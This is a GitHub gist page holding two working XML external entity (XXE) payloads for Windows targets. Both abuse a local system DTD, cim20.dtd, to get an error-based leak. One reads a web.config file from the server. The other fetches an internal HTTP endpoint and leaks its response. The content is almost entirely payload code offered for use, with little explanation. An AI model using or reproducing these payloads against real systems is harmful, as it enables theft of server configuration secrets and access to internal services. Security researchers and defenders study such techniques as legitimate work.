Skip to content

Instantly share code, notes, and snippets.

@infosec-au

infosec-au/xxe-windows.md Secret

Created February 4, 2021 01:10
Show Gist options
  • Star 16 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
  • Save infosec-au/2c60dc493053ead1af42de1ca3bdcc79 to your computer and use it in GitHub Desktop.
Save infosec-au/2c60dc493053ead1af42de1ca3bdcc79 to your computer and use it in GitHub Desktop.
Download ZIP
Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
Raw
xxe-windows.md

Disclose local file:

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;
  ]><xxx>cacat</xxx>

Disclose HTTP Response:

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "https://erp.company.com">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;
  ]><xxx>cacat</xxx>

Credit for hash fragment information disclosure trick goes to https://twitter.com/nytr0gen_

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment